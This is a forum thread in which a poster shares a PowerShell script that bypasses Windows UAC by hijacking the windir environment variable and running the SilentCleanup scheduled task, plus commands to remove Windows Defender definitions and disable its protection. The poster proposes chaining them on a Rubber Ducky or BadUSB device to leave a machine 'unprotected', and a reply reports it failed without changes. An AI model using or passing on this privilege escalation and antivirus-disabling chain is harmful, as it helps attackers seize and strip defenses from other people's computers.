ramirez.r1214 Posted May 24, 2019 Share Posted May 24, 2019 So I had an Idea recently not sure if it'll work don't bash me on it but I was thinking about combining some of darrens videos and using a bad usb or a rubber ducky to not only bypass uac but turn off defender I been trying this for some time now trying this on my virtual box and windows 10 laptop.In one of his videos he shows Promptless UAC Bypass & Powershell Privilege Escalation. ~~~~~~~~~~~~~~~~~~~~~ if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) { #Payload goes here #It'll run as Administrator } else { $registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-ItemProperty -Path $registryPath -Name $name -Value $Value #Depending on the performance of the machine, some sleep time may be required before or after schtasks schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null Remove-ItemProperty -Path $registryPath -Name $name } ~~~~~~~~~~~~~~~~~~~~~~ (what I have learned from running this in a notepad then saving as a uac.ps1 but before executing the uac.ps1 you need to run "Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass" and select yes to avoid the "script is not signed" error) also using the code from Disabling Defender With Viss Episode 1 showed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "c\program files\windows defender\mpcmdrun.exe" -RemoveDefinitions -All set-MpPreference -DisableIOVProtection $true ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ disabling defender but it needs to be run in the admin CMD what I am thinking here is some how coding a rubber ducky in to first bypassing uac then disabling windows defender That way you can begin and have fun with your unlocked unprotected machine. Once again just an idea I have no clue if its possible or makes sense. But id really love to try. Link to comment Share on other sites More sharing options...
xaveedra Posted November 10, 2019 Share Posted November 10, 2019 It's a brilliant idea but unfortunately didn't work unless for me I think the problem is the options weren't written in a proper way as the path too, It might work after modifying Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.